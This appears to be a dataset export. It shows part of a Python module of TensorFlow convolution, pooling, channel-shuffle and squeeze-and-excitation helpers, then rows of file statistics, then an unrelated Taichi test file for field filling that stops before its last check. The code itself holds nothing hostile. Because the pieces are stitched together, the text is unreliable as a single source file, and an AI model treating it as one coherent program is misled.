        # partial window, emulating ceil-mode output sizes.
        # NOTE(review): x.shape[2]/x.shape[3] are H/W only under
        # channels_first (NCHW); with channels_last these index W and C.
        # Looks like ceil_mode is only exercised with NCHW inputs — TODO
        # confirm.
        height = int(x.shape[2])
        out_height = float(height + 2 * padding[0] - pool_size[0]) / strides[0] + 1.0
        if math.ceil(out_height) > math.floor(out_height):
            padding = (padding[0] + 1, padding[1])
        width = int(x.shape[3])
        out_width = float(width + 2 * padding[1] - pool_size[1]) / strides[1] + 1.0
        if math.ceil(out_width) > math.floor(out_width):
            padding = (padding[0], padding[1] + 1)
    if (padding[0] > 0) or (padding[1] > 0):
        # Explicit pre-padding, since the pooling layer itself runs "valid".
        # Note: ``padding`` is reused as the (before, after) pair for BOTH
        # spatial dims. REFLECT mode mirrors existing values rather than
        # inserting zeros.
        if is_channels_first(data_format):
            x = tf.pad(x, [[0, 0], [0, 0], list(padding), list(padding)], mode="REFLECT")
        else:
            x = tf.pad(x, [[0, 0], list(padding), list(padding), [0, 0]], mode="REFLECT")
    x = tf.keras.layers.MaxPooling2D(
        pool_size=pool_size,
        strides=strides,
        padding="valid",
        data_format=data_format,
        name=name)(x)
    return x
def avgpool2d(x,
              pool_size,
              strides,
              padding=0,
              ceil_mode=False,
              data_format="channels_last",
              name=None):
    """
    Average pooling operation for two dimensional (spatial) data.

    Parameters:
    ----------
    x : Tensor
        Input tensor.
    pool_size : int or tuple/list of 2 int
        Size of the max pooling windows.
    strides : int or tuple/list of 2 int
        Strides of the pooling.
    padding : int or tuple/list of 2 int, default 0
        Padding value for convolution layer.
    ceil_mode : bool, default False
        When `True`, will use ceil instead of floor to compute the output shape.
    data_format : str, default 'channels_last'
        The ordering of the dimensions in tensors.
    name : str, default None
        Layer name.

    Returns
    -------
    Tensor
        Resulted tensor.
    """
    # Normalize scalar arguments to (h, w) pairs.
    if isinstance(pool_size, int):
        pool_size = (pool_size, pool_size)
    if isinstance(strides, int):
        strides = (strides, strides)
    if isinstance(padding, int):
        padding = (padding, padding)
    if ceil_mode:
        # Grow the padding by one whenever floor division would drop a
        # partial window, emulating ceil-mode output sizes.
        # NOTE(review): x.shape[2]/x.shape[3] are H/W only under
        # channels_first (NCHW); with channels_last these index W and C.
        # Looks like ceil_mode is only exercised with NCHW inputs — TODO
        # confirm.
        height = int(x.shape[2])
        out_height = float(height + 2 * padding[0] - pool_size[0]) / strides[0] + 1.0
        if math.ceil(out_height) > math.floor(out_height):
            padding = (padding[0] + 1, padding[1])
        width = int(x.shape[3])
        out_width = float(width + 2 * padding[1] - pool_size[1]) / strides[1] + 1.0
        if math.ceil(out_width) > math.floor(out_width):
            padding = (padding[0], padding[1] + 1)
    if (padding[0] > 0) or (padding[1] > 0):
        # CONSTANT (zero) padding: the inserted zeros are counted in the
        # averages of border windows.
        if is_channels_first(data_format):
            x = tf.pad(x, [[0, 0], [0, 0], list(padding), list(padding)], mode="CONSTANT")
        else:
            x = tf.pad(x, [[0, 0], list(padding), list(padding), [0, 0]], mode="CONSTANT")
    # Pool at stride 1 first, then subsample with a second 1x1 pool below —
    # presumably to keep window placement aligned with the asymmetric
    # ceil-mode padding; confirm before simplifying.
    x = tf.keras.layers.AveragePooling2D(
        pool_size=pool_size,
        strides=1,
        padding="valid",
        data_format=data_format,
        name=name)(x)
    if (strides[0] > 1) or (strides[1] > 1):
        # Bug fix: ``name`` defaults to None, and ``None + "/stride"``
        # raised TypeError whenever strides > 1 without an explicit name.
        stride_name = None if name is None else name + "/stride"
        x = tf.keras.layers.AveragePooling2D(
            pool_size=1,
            strides=strides,
            padding="valid",
            data_format=data_format,
            name=stride_name)(x)
    return x
def conv2d(x,
           in_channels,
           out_channels,
           kernel_size,
           strides=1,
           padding=0,
           dilation=1,
           groups=1,
           use_bias=True,
           data_format="channels_last",
           name="conv2d"):
    """
    Convolution 2D layer wrapper.

    Dispatches to one of three implementations: a plain Keras Conv2D
    (groups == 1), a true depthwise convolution (groups == in_channels ==
    out_channels), or a manual grouped convolution (slice, convolve each
    group, concat).

    Parameters:
    ----------
    x : Tensor
        Input tensor.
    in_channels : int
        Number of input channels.
    out_channels : int
        Number of output channels.
    kernel_size : int or tuple/list of 2 int
        Convolution window size.
    strides : int or tuple/list of 2 int
        Strides of the convolution.
    padding : int or tuple/list of 2 int
        Padding value for convolution layer.
    dilation : int or tuple/list of 2 int, default 1
        Dilation value for convolution layer.
    groups : int, default 1
        Number of groups.
    use_bias : bool, default False
        Whether the layer uses a bias vector.
    data_format : str, default 'channels_last'
        The ordering of the dimensions in tensors.
    name : str, default 'conv2d'
        Layer name.

    Returns
    -------
    Tensor
        Resulted tensor.
    """
    # Normalize scalar arguments to (h, w) pairs.
    if isinstance(kernel_size, int):
        kernel_size = (kernel_size, kernel_size)
    if isinstance(strides, int):
        strides = (strides, strides)
    if isinstance(padding, int):
        padding = (padding, padding)
    if isinstance(dilation, int):
        dilation = (dilation, dilation)
    if (padding[0] > 0) or (padding[1] > 0):
        # Explicit zero pre-padding; all conv calls below run "valid".
        if is_channels_first(data_format):
            paddings_tf = [[0, 0], [0, 0], list(padding), list(padding)]
        else:
            paddings_tf = [[0, 0], list(padding), list(padding), [0, 0]]
        x = tf.pad(x, paddings=paddings_tf)
    if groups == 1:
        # Ordinary convolution.
        x = tf.keras.layers.Conv2D(
            filters=out_channels,
            kernel_size=kernel_size,
            strides=strides,
            padding="valid",
            data_format=data_format,
            dilation_rate=dilation,
            use_bias=use_bias,
            kernel_initializer=tf.contrib.layers.variance_scaling_initializer(2.0),
            name=name)(x)
    elif (groups == out_channels) and (out_channels == in_channels):
        # Depthwise convolution via the low-level op. Dilation and bias are
        # not supported on this path (bias raises below, after the conv).
        assert (dilation[0] == 1) and (dilation[1] == 1)
        # Note: ``kernel_size + (in_channels, 1)`` assumes kernel_size is a
        # tuple at this point (guaranteed by the int-normalization above,
        # but not if a list was passed in).
        kernel = tf.get_variable(
            name=name + "/dw_kernel",
            shape=kernel_size + (in_channels, 1),
            initializer=tf.variance_scaling_initializer(2.0))
        x = tf.nn.depthwise_conv2d(
            input=x,
            filter=kernel,
            strides=(1, 1) + strides if is_channels_first(data_format) else (1,) + strides + (1,),
            padding="VALID",
            rate=(1, 1),
            name=name,
            data_format="NCHW" if is_channels_first(data_format) else "NHWC")
        if use_bias:
            raise NotImplementedError
    else:
        # General grouped convolution: slice the channel axis into equal
        # groups, convolve each slice independently, then re-concatenate.
        assert (in_channels % groups == 0)
        assert (out_channels % groups == 0)
        in_group_channels = in_channels // groups
        out_group_channels = out_channels // groups
        group_list = []
        for gi in range(groups):
            if is_channels_first(data_format):
                xi = x[:, gi * in_group_channels:(gi + 1) * in_group_channels, :, :]
            else:
                xi = x[:, :, :, gi * in_group_channels:(gi + 1) * in_group_channels]
            xi = tf.keras.layers.Conv2D(
                filters=out_group_channels,
                kernel_size=kernel_size,
                strides=strides,
                padding="valid",
                data_format=data_format,
                dilation_rate=dilation,
                use_bias=use_bias,
                kernel_initializer=tf.contrib.layers.variance_scaling_initializer(2.0),
                name=name + "/convgroup{}".format(gi + 1))(xi)
            group_list.append(xi)
        x = tf.concat(group_list, axis=get_channel_axis(data_format), name=name + "/concat")
    return x
def conv1x1(x,
            in_channels,
            out_channels,
            strides=1,
            groups=1,
            use_bias=False,
            data_format="channels_last",
            name="conv1x1"):
    """
    Convolution 1x1 layer.

    A pointwise convolution: conv2d with the kernel size fixed to 1 and no
    padding.

    Parameters:
    ----------
    x : Tensor
        Input tensor.
    in_channels : int
        Number of input channels.
    out_channels : int
        Number of output channels.
    strides : int or tuple/list of 2 int, default 1
        Strides of the convolution.
    groups : int, default 1
        Number of groups.
    use_bias : bool, default False
        Whether the layer uses a bias vector.
    data_format : str, default 'channels_last'
        The ordering of the dimensions in tensors.
    name : str, default 'conv1x1'
        Layer name.

    Returns
    -------
    Tensor
        Resulted tensor.
    """
    conv_kwargs = dict(
        x=x,
        in_channels=in_channels,
        out_channels=out_channels,
        kernel_size=1,
        strides=strides,
        groups=groups,
        use_bias=use_bias,
        data_format=data_format,
        name=name)
    return conv2d(**conv_kwargs)
def conv3x3(x,
            in_channels,
            out_channels,
            strides=1,
            padding=1,
            groups=1,
            use_bias=False,
            data_format="channels_last",
            name="conv3x3"):
    """
    Convolution 3x3 layer.

    A conv2d with the kernel size fixed to 3; the default padding of 1
    keeps the spatial size unchanged at stride 1.

    Parameters:
    ----------
    x : Tensor
        Input tensor.
    in_channels : int
        Number of input channels.
    out_channels : int
        Number of output channels.
    strides : int or tuple/list of 2 int, default 1
        Strides of the convolution.
    padding : int or tuple/list of 2 int, default 1
        Padding value for convolution layer.
    groups : int, default 1
        Number of groups.
    use_bias : bool, default False
        Whether the layer uses a bias vector.
    data_format : str, default 'channels_last'
        The ordering of the dimensions in tensors.
    name : str, default 'conv3x3'
        Block name.

    Returns
    -------
    Tensor
        Resulted tensor.
    """
    conv_kwargs = dict(
        x=x,
        in_channels=in_channels,
        out_channels=out_channels,
        kernel_size=3,
        strides=strides,
        padding=padding,
        groups=groups,
        use_bias=use_bias,
        data_format=data_format,
        name=name)
    return conv2d(**conv_kwargs)
def depthwise_conv3x3(x,
                      channels,
                      strides,
                      data_format="channels_last",
                      name="depthwise_conv3x3"):
    """
    Depthwise convolution 3x3 layer.

    Expressed as a grouped 3x3 conv2d with groups equal to the channel
    count, padding 1, and no bias.

    Parameters:
    ----------
    x : Tensor
        Input tensor.
    channels : int
        Number of input/output channels.
    strides : int or tuple/list of 2 int
        Strides of the convolution.
    data_format : str, default 'channels_last'
        The ordering of the dimensions in tensors.
    name : str, default 'depthwise_conv3x3'
        Block name.

    Returns
    -------
    Tensor
        Resulted tensor.
    """
    dw_kwargs = dict(
        x=x,
        in_channels=channels,
        out_channels=channels,
        kernel_size=3,
        strides=strides,
        padding=1,
        groups=channels,
        use_bias=False,
        data_format=data_format,
        name=name)
    return conv2d(**dw_kwargs)
def conv_block(x,
               in_channels,
               out_channels,
               kernel_size,
               strides,
               padding,
               dilation=1,
               groups=1,
               use_bias=False,
               use_bn=True,
               activation="relu",
               training=False,
               data_format="channels_last",
               name="conv_block"):
    """
    Standard convolution block with Batch normalization and activation.

    Pipeline: conv2d -> (optional) batchnorm -> (optional) activation.

    Parameters:
    ----------
    x : Tensor
        Input tensor.
    in_channels : int
        Number of input channels.
    out_channels : int
        Number of output channels.
    kernel_size : int or tuple/list of 2 int
        Convolution window size.
    strides : int or tuple/list of 2 int
        Strides of the convolution.
    padding : int or tuple/list of 2 int
        Padding value for convolution layer.
    dilation : int or tuple/list of 2 int, default 1
        Dilation value for convolution layer.
    groups : int, default 1
        Number of groups.
    use_bias : bool, default False
        Whether the layer uses a bias vector.
    use_bn : bool, default True
        Whether to use BatchNorm layer.
    activation : function or str or None, default 'relu'
        Activation function or name of activation function.
    training : bool, or a TensorFlow boolean scalar tensor, default False
        Whether to return the output in training mode or in inference mode.
    data_format : str, default 'channels_last'
        The ordering of the dimensions in tensors.
    name : str, default 'conv_block'
        Block name.

    Returns
    -------
    Tensor
        Resulted tensor.
    """
    out = conv2d(
        x=x,
        in_channels=in_channels,
        out_channels=out_channels,
        kernel_size=kernel_size,
        strides=strides,
        padding=padding,
        dilation=dilation,
        groups=groups,
        use_bias=use_bias,
        data_format=data_format,
        name=name + "/conv")
    if use_bn:
        out = batchnorm(
            x=out,
            training=training,
            data_format=data_format,
            name=name + "/bn")
    if activation is not None:
        out = get_activation_layer(
            x=out,
            activation=activation,
            name=name + "/activ")
    return out
def conv1x1_block(x,
                  in_channels,
                  out_channels,
                  strides=1,
                  groups=1,
                  use_bias=False,
                  activation="relu",
                  training=False,
                  data_format="channels_last",
                  name="conv1x1_block",
                  use_bn=True):
    """
    1x1 version of the standard convolution block.

    Generalized for consistency with ``conv_block``/``conv3x3_block``: a
    trailing ``use_bn`` switch (default True, preserving previous behavior
    and positional-call compatibility) now allows disabling the BatchNorm
    layer.

    Parameters:
    ----------
    x : Tensor
        Input tensor.
    in_channels : int
        Number of input channels.
    out_channels : int
        Number of output channels.
    strides : int or tuple/list of 2 int, default 1
        Strides of the convolution.
    groups : int, default 1
        Number of groups.
    use_bias : bool, default False
        Whether the layer uses a bias vector.
    activation : function or str or None, default 'relu'
        Activation function or name of activation function.
    training : bool, or a TensorFlow boolean scalar tensor, default False
        Whether to return the output in training mode or in inference mode.
    data_format : str, default 'channels_last'
        The ordering of the dimensions in tensors.
    name : str, default 'conv1x1_block'
        Block name.
    use_bn : bool, default True
        Whether to use BatchNorm layer.

    Returns
    -------
    Tensor
        Resulted tensor.
    """
    return conv_block(
        x=x,
        in_channels=in_channels,
        out_channels=out_channels,
        kernel_size=1,
        strides=strides,
        padding=0,
        groups=groups,
        use_bias=use_bias,
        use_bn=use_bn,
        activation=activation,
        training=training,
        data_format=data_format,
        name=name)
def conv3x3_block(x,
                  in_channels,
                  out_channels,
                  strides=1,
                  padding=1,
                  dilation=1,
                  groups=1,
                  use_bias=False,
                  use_bn=True,
                  activation="relu",
                  training=False,
                  data_format="channels_last",
                  name="conv3x3_block"):
    """
    3x3 version of the standard convolution block.

    Parameters:
    ----------
    x : Tensor
        Input tensor.
    in_channels : int
        Number of input channels.
    out_channels : int
        Number of output channels.
    strides : int or tuple/list of 2 int, default 1
        Strides of the convolution.
    padding : int or tuple/list of 2 int, default 1
        Padding value for convolution layer.
    dilation : int or tuple/list of 2 int, default 1
        Dilation value for convolution layer.
    groups : int, default 1
        Number of groups.
    use_bias : bool, default False
        Whether the layer uses a bias vector.
    use_bn : bool, default True
        Whether to use BatchNorm layer.
    activation : function or str or None, default 'relu'
        Activation function or name of activation function.
    training : bool, or a TensorFlow boolean scalar tensor, default False
        Whether to return the output in training mode or in inference mode.
    data_format : str, default 'channels_last'
        The ordering of the dimensions in tensors.
    name : str, default 'conv3x3_block'
        Block name.

    Returns
    -------
    Tensor
        Resulted tensor.
    """
    # Delegate to the generic block with the kernel size pinned to 3.
    block_kwargs = dict(
        x=x,
        in_channels=in_channels,
        out_channels=out_channels,
        kernel_size=3,
        strides=strides,
        padding=padding,
        dilation=dilation,
        groups=groups,
        use_bias=use_bias,
        use_bn=use_bn,
        activation=activation,
        training=training,
        data_format=data_format,
        name=name)
    return conv_block(**block_kwargs)
def conv5x5_block(x,
                  in_channels,
                  out_channels,
                  strides=1,
                  padding=2,
                  dilation=1,
                  groups=1,
                  use_bias=False,
                  activation="relu",
                  training=False,
                  data_format="channels_last",
                  name="conv3x3_block"):
    """
    5x5 version of the standard convolution block.

    Parameters:
    ----------
    x : Tensor
        Input tensor.
    in_channels : int
        Number of input channels.
    out_channels : int
        Number of output channels.
    strides : int or tuple/list of 2 int, default 1
        Strides of the convolution.
    padding : int or tuple/list of 2 int, default 2
        Padding value for convolution layer.
    dilation : int or tuple/list of 2 int, default 1
        Dilation value for convolution layer.
    groups : int, default 1
        Number of groups.
    use_bias : bool, default False
        Whether the layer uses a bias vector.
    activation : function or str or None, default 'relu'
        Activation function or name of activation function.
    training : bool, or a TensorFlow boolean scalar tensor, default False
        Whether to return the output in training mode or in inference mode.
    data_format : str, default 'channels_last'
        The ordering of the dimensions in tensors.
    name : str, default 'conv3x3_block'
        Block name.

    Returns
    -------
    Tensor
        Resulted tensor.
    """
    # NOTE(review): the default name 'conv3x3_block' looks like a copy-paste
    # from conv3x3_block and should probably be 'conv5x5_block'. It is kept
    # as-is because changing the default would change variable-scope names
    # for callers that rely on it (e.g. pretrained-weight loading) — confirm
    # before renaming.
    return conv_block(
        x=x,
        in_channels=in_channels,
        out_channels=out_channels,
        kernel_size=5,
        strides=strides,
        padding=padding,
        dilation=dilation,
        groups=groups,
        use_bias=use_bias,
        activation=activation,
        training=training,
        data_format=data_format,
        name=name)
def conv7x7_block(x,
                  in_channels,
                  out_channels,
                  strides=1,
                  padding=3,
                  use_bias=False,
                  activation="relu",
                  training=False,
                  data_format="channels_last",
                  name="conv7x7_block"):
    """
    7x7 version of the standard convolution block.

    Parameters:
    ----------
    x : Tensor
        Input tensor.
    in_channels : int
        Number of input channels.
    out_channels : int
        Number of output channels.
    strides : int or tuple/list of 2 int, default 1
        Strides of the convolution.
    padding : int or tuple/list of 2 int, default 3
        Padding value for convolution layer.
    use_bias : bool, default False
        Whether the layer uses a bias vector.
    activation : function or str or None, default 'relu'
        Activation function or name of activation function.
    training : bool, or a TensorFlow boolean scalar tensor, default False
        Whether to return the output in training mode or in inference mode.
    data_format : str, default 'channels_last'
        The ordering of the dimensions in tensors.
    name : str, default 'conv7x7_block'
        Block name.

    Returns
    -------
    Tensor
        Resulted tensor.
    """
    # Fixed 7x7 kernel; the default padding of 3 preserves spatial size at stride 1.
    return conv_block(
        x=x,
        in_channels=in_channels,
        out_channels=out_channels,
        kernel_size=7,
        strides=strides,
        padding=padding,
        use_bias=use_bias,
        activation=activation,
        training=training,
        data_format=data_format,
        name=name)
def dwconv3x3_block(x,
                    in_channels,
                    out_channels,
                    strides=1,
                    padding=1,
                    dilation=1,
                    use_bias=False,
                    activation="relu",
                    training=False,
                    data_format="channels_last",
                    name="dwconv3x3_block"):
    """
    3x3 depthwise version of the standard convolution block.

    Parameters:
    ----------
    x : Tensor
        Input tensor.
    in_channels : int
        Number of input channels.
    out_channels : int
        Number of output channels.
    strides : int or tuple/list of 2 int, default 1
        Strides of the convolution.
    padding : int or tuple/list of 2 int, default 1
        Padding value for convolution layer.
    dilation : int or tuple/list of 2 int, default 1
        Dilation value for convolution layer.
    use_bias : bool, default False
        Whether the layer uses a bias vector.
    activation : function or str or None, default 'relu'
        Activation function or name of activation function.
    training : bool, or a TensorFlow boolean scalar tensor, default False
        Whether to return the output in training mode or in inference mode.
    data_format : str, default 'channels_last'
        The ordering of the dimensions in tensors.
    name : str, default 'dwconv3x3_block'
        Block name.

    Returns
    -------
    Tensor
        Resulted tensor.
    """
    # Depthwise convolution is expressed as a grouped conv with one group
    # per output channel.
    block_kwargs = dict(
        x=x,
        in_channels=in_channels,
        out_channels=out_channels,
        strides=strides,
        padding=padding,
        dilation=dilation,
        groups=out_channels,
        use_bias=use_bias,
        activation=activation,
        training=training,
        data_format=data_format,
        name=name)
    return conv3x3_block(**block_kwargs)
def dwconv5x5_block(x,
                    in_channels,
                    out_channels,
                    strides=1,
                    padding=2,
                    dilation=1,
                    use_bias=False,
                    activation="relu",
                    training=False,
                    data_format="channels_last",
                    name="dwconv3x3_block"):
    """
    5x5 depthwise version of the standard convolution block.

    Parameters:
    ----------
    x : Tensor
        Input tensor.
    in_channels : int
        Number of input channels.
    out_channels : int
        Number of output channels.
    strides : int or tuple/list of 2 int, default 1
        Strides of the convolution.
    padding : int or tuple/list of 2 int, default 2
        Padding value for convolution layer.
    dilation : int or tuple/list of 2 int, default 1
        Dilation value for convolution layer.
    use_bias : bool, default False
        Whether the layer uses a bias vector.
    activation : function or str or None, default 'relu'
        Activation function or name of activation function.
    training : bool, or a TensorFlow boolean scalar tensor, default False
        Whether to return the output in training mode or in inference mode.
    data_format : str, default 'channels_last'
        The ordering of the dimensions in tensors.
    name : str, default 'dwconv3x3_block'
        Block name.

    Returns
    -------
    Tensor
        Resulted tensor.
    """
    # NOTE(review): the default name 'dwconv3x3_block' looks like a
    # copy-paste from dwconv3x3_block and should probably be
    # 'dwconv5x5_block'. Kept as-is because renaming the default would
    # change variable-scope names for default callers — confirm first.
    # Depthwise: groups == out_channels, one filter per channel.
    return conv5x5_block(
        x=x,
        in_channels=in_channels,
        out_channels=out_channels,
        strides=strides,
        padding=padding,
        dilation=dilation,
        groups=out_channels,
        use_bias=use_bias,
        activation=activation,
        training=training,
        data_format=data_format,
        name=name)
def pre_conv_block(x,
                   in_channels,
                   out_channels,
                   kernel_size,
                   strides,
                   padding,
                   return_preact=False,
                   training=False,
                   data_format="channels_last",
                   name="pre_conv_block"):
    """
    Convolution block with Batch normalization and ReLU pre-activation.

    Parameters:
    ----------
    x : Tensor
        Input tensor.
    in_channels : int
        Number of input channels.
    out_channels : int
        Number of output channels.
    kernel_size : int or tuple/list of 2 int
        Convolution window size.
    strides : int or tuple/list of 2 int
        Strides of the convolution.
    padding : int or tuple/list of 2 int
        Padding value for convolution layer.
    return_preact : bool, default False
        Whether return pre-activation. It's used by PreResNet.
    training : bool, or a TensorFlow boolean scalar tensor, default False
        Whether to return the output in training mode or in inference mode.
    data_format : str, default 'channels_last'
        The ordering of the dimensions in tensors.
    name : str, default 'pre_conv_block'
        Block name.

    Returns
    -------
    tuple of two Tensors
        Resulted tensor and preactivated input tensor.
    """
    # Pre-activation ordering: BN -> ReLU -> conv (He et al., PreResNet).
    pre_activ = batchnorm(
        x=x,
        training=training,
        data_format=data_format,
        name=name + "/bn")
    pre_activ = tf.nn.relu(pre_activ, name=name + "/activ")
    out = conv2d(
        x=pre_activ,
        in_channels=in_channels,
        out_channels=out_channels,
        kernel_size=kernel_size,
        strides=strides,
        padding=padding,
        use_bias=False,
        data_format=data_format,
        name=name + "/conv")
    if return_preact:
        # PreResNet taps the pre-activated tensor for its identity branch.
        return out, pre_activ
    return out
def pre_conv1x1_block(x,
                      in_channels,
                      out_channels,
                      strides=1,
                      return_preact=False,
                      training=False,
                      data_format="channels_last",
                      name="pre_conv1x1_block"):
    """
    1x1 version of the pre-activated convolution block.

    Parameters:
    ----------
    x : Tensor
        Input tensor.
    in_channels : int
        Number of input channels.
    out_channels : int
        Number of output channels.
    strides : int or tuple/list of 2 int, default 1
        Strides of the convolution.
    return_preact : bool, default False
        Whether return pre-activation. It's used by PreResNet.
    training : bool, or a TensorFlow boolean scalar tensor, default False
        Whether to return the output in training mode or in inference mode.
    data_format : str, default 'channels_last'
        The ordering of the dimensions in tensors.
    name : str, default 'pre_conv1x1_block'
        Block name.

    Returns
    -------
    tuple of two Tensors
        Resulted tensor and preactivated input tensor.
    """
    # Pointwise pre-activated conv: 1x1 kernel, no padding.
    block_kwargs = dict(
        x=x,
        in_channels=in_channels,
        out_channels=out_channels,
        kernel_size=1,
        strides=strides,
        padding=0,
        return_preact=return_preact,
        training=training,
        data_format=data_format,
        name=name)
    return pre_conv_block(**block_kwargs)
def pre_conv3x3_block(x,
                      in_channels,
                      out_channels,
                      strides=1,
                      return_preact=False,
                      training=False,
                      data_format="channels_last",
                      name="pre_conv3x3_block"):
    """
    3x3 version of the pre-activated convolution block.

    Parameters:
    ----------
    x : Tensor
        Input tensor.
    in_channels : int
        Number of input channels.
    out_channels : int
        Number of output channels.
    strides : int or tuple/list of 2 int, default 1
        Strides of the convolution.
    return_preact : bool, default False
        Whether return pre-activation. It's used by PreResNet.
    training : bool, or a TensorFlow boolean scalar tensor, default False
        Whether to return the output in training mode or in inference mode.
    data_format : str, default 'channels_last'
        The ordering of the dimensions in tensors.
    name : str, default 'pre_conv3x3_block'
        Block name.

    Returns
    -------
    tuple of two Tensors
        Resulted tensor and preactivated input tensor.
    """
    # 3x3 pre-activated conv with "same"-style padding of 1.
    block_kwargs = dict(
        x=x,
        in_channels=in_channels,
        out_channels=out_channels,
        kernel_size=3,
        strides=strides,
        padding=1,
        return_preact=return_preact,
        training=training,
        data_format=data_format,
        name=name)
    return pre_conv_block(**block_kwargs)
def channel_shuffle(x,
                    groups,
                    data_format):
    """
    Channel shuffle operation from 'ShuffleNet: An Extremely Efficient Convolutional Neural Network for Mobile Devices,'
    https://arxiv.org/abs/1707.01083.

    Parameters:
    ----------
    x : Tensor
        Input tensor.
    groups : int
        Number of groups.
    data_format : str
        The ordering of the dimensions in tensors.

    Returns
    -------
    Tensor
        Resulted tensor.
    """
    static_shape = x.get_shape().as_list()
    channels_first = is_channels_first(data_format)
    if channels_first:
        channels, height, width = static_shape[1], static_shape[2], static_shape[3]
    else:
        height, width, channels = static_shape[1], static_shape[2], static_shape[3]
    assert (channels % groups == 0)
    channels_per_group = channels // groups
    # Shuffle = split channels into (groups, channels_per_group), swap those
    # two axes, then flatten back to a single channel axis.
    if channels_first:
        y = tf.reshape(x, shape=(-1, groups, channels_per_group, height, width))
        y = tf.transpose(y, perm=(0, 2, 1, 3, 4))
        return tf.reshape(y, shape=(-1, channels, height, width))
    y = tf.reshape(x, shape=(-1, height, width, groups, channels_per_group))
    y = tf.transpose(y, perm=(0, 1, 2, 4, 3))
    return tf.reshape(y, shape=(-1, height, width, channels))
def channel_shuffle2(x,
                     groups,
                     data_format):
    """
    Channel shuffle operation from 'ShuffleNet: An Extremely Efficient Convolutional Neural Network for Mobile Devices,'
    https://arxiv.org/abs/1707.01083.
    The alternative version.

    Parameters:
    ----------
    x : Tensor
        Input tensor.
    groups : int
        Number of groups.
    data_format : str
        The ordering of the dimensions in tensors.

    Returns
    -------
    Tensor
        Resulted tensor.
    """
    static_shape = x.get_shape().as_list()
    channels_first = is_channels_first(data_format)
    if channels_first:
        channels, height, width = static_shape[1], static_shape[2], static_shape[3]
    else:
        height, width, channels = static_shape[1], static_shape[2], static_shape[3]
    assert (channels % groups == 0)
    channels_per_group = channels // groups
    # Alternative shuffle: split as (channels_per_group, groups) — the
    # transposed factor order relative to channel_shuffle.
    if channels_first:
        y = tf.reshape(x, shape=(-1, channels_per_group, groups, height, width))
        y = tf.transpose(y, perm=(0, 2, 1, 3, 4))
        return tf.reshape(y, shape=(-1, channels, height, width))
    y = tf.reshape(x, shape=(-1, height, width, channels_per_group, groups))
    y = tf.transpose(y, perm=(0, 1, 2, 4, 3))
    return tf.reshape(y, shape=(-1, height, width, channels))
def se_block(x,
             channels,
             reduction=16,
             activation="relu",
             data_format="channels_last",
             name="se_block"):
    """
    Squeeze-and-Excitation block from 'Squeeze-and-Excitation Networks,' https://arxiv.org/abs/1709.01507.

    Parameters:
    ----------
    x : Tensor
        Input tensor.
    channels : int
        Number of channels.
    reduction : int, default 16
        Squeeze reduction value.
    activation : function or str, default 'relu'
        Activation function or name of activation function.
    data_format : str, default 'channels_last'
        The ordering of the dimensions in tensors.
    name : str, default 'se_block'
        Block name.

    Returns
    -------
    Tensor
        Resulted tensor.
    """
    assert (len(x.shape) == 4)
    mid_channels = channels // reduction
    # Squeeze: global average pooling over the spatial dimensions.
    if is_channels_first(data_format):
        pool_size = x.shape[2:4]
    else:
        pool_size = x.shape[1:3]
    w = tf.keras.layers.AveragePooling2D(
        pool_size=pool_size,
        strides=1,
        data_format=data_format,
        name=name + "/pool")(x)
    # Excitation: bottleneck MLP implemented with two 1x1 convolutions.
    w = conv1x1(
        x=w,
        in_channels=channels,
        out_channels=mid_channels,
        use_bias=True,
        data_format=data_format,
        name=name + "/conv1/conv")
    w = get_activation_layer(
        x=w,
        activation=activation,
        name=name + "/activ")
    w = conv1x1(
        x=w,
        in_channels=mid_channels,
        out_channels=channels,
        use_bias=True,
        data_format=data_format,
        name=name + "/conv2/conv")
    # Scale: gate each channel of the input by its learned weight.
    w = tf.nn.sigmoid(w, name=name + "/sigmoid")
    return x * w
| 29.373438
| 120
| 0.575882
| 4,413
| 37,598
| 4.771584
| 0.052119
| 0.052239
| 0.047823
| 0.025265
| 0.869212
| 0.849931
| 0.829938
| 0.80871
| 0.794605
| 0.772
| 0
| 0.018343
| 0.335896
| 37,598
| 1,279
| 121
| 29.396403
| 0.824983
| 0.416777
| 0
| 0.755973
| 0
| 0
| 0.047195
| 0
| 0
| 0
| 0
| 0
| 0.011945
| 1
| 0.040956
| false
| 0
| 0.005119
| 0
| 0.088737
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0a04e9649b1909d2c07b1404ed0bf78ab3daae45
| 1,305
|
py
|
Python
|
tests/python/test_fill.py
|
winnerineast/taichi
|
57ae0abc374e0df8f0b54bde4bcb92d9d97ed269
|
[
"MIT"
] | null | null | null |
tests/python/test_fill.py
|
winnerineast/taichi
|
57ae0abc374e0df8f0b54bde4bcb92d9d97ed269
|
[
"MIT"
] | null | null | null |
tests/python/test_fill.py
|
winnerineast/taichi
|
57ae0abc374e0df8f0b54bde4bcb92d9d97ed269
|
[
"MIT"
] | null | null | null |
import taichi as ti
@ti.all_archs
def test_fill_scalar():
    # Fill a dense 2D scalar field with a constant and check every entry.
    rows, cols = 4, 7
    val = ti.var(ti.i32)

    @ti.layout
    def values():
        ti.root.dense(ti.ij, (rows, cols)).place(val)

    # Seed the field with distinct values so fill() has to overwrite them.
    for r in range(rows):
        for c in range(cols):
            val[r, c] = r + c * 3
    val.fill(2)
    for r in range(rows):
        for c in range(cols):
            assert val[r, c] == 2
@ti.all_archs
def test_fill_matrix_scalar():
    # Fill a dense field of 2x3 integer matrices with a scalar value.
    rows, cols = 4, 7
    val = ti.Vector(2, 3, ti.i32)

    @ti.layout
    def values():
        ti.root.dense(ti.ij, (rows, cols)).place(val)

    # Seed every matrix entry so fill() has to overwrite them all.
    for r in range(rows):
        for c in range(cols):
            for p in range(2):
                for q in range(3):
                    val[r, c][p, q] = r + c * 3
    val.fill(2)
    for r in range(rows):
        for c in range(cols):
            for p in range(2):
                for q in range(3):
                    assert val[r, c][p, q] == 2
@ti.all_archs
def test_fill_matrix_matrix():
    # Fill a dense field of 2x3 matrices with a whole matrix value.
    rows, cols = 4, 7
    val = ti.Vector(2, 3, ti.i32)

    @ti.layout
    def values():
        ti.root.dense(ti.ij, (rows, cols)).place(val)

    # Seed every matrix entry so fill() has to overwrite them all.
    for r in range(rows):
        for c in range(cols):
            for p in range(2):
                for q in range(3):
                    val[r, c][p, q] = r + c * 3
    mat = ti.Matrix([[0, 1, 2], [2, 3, 4]])
    val.fill(mat)
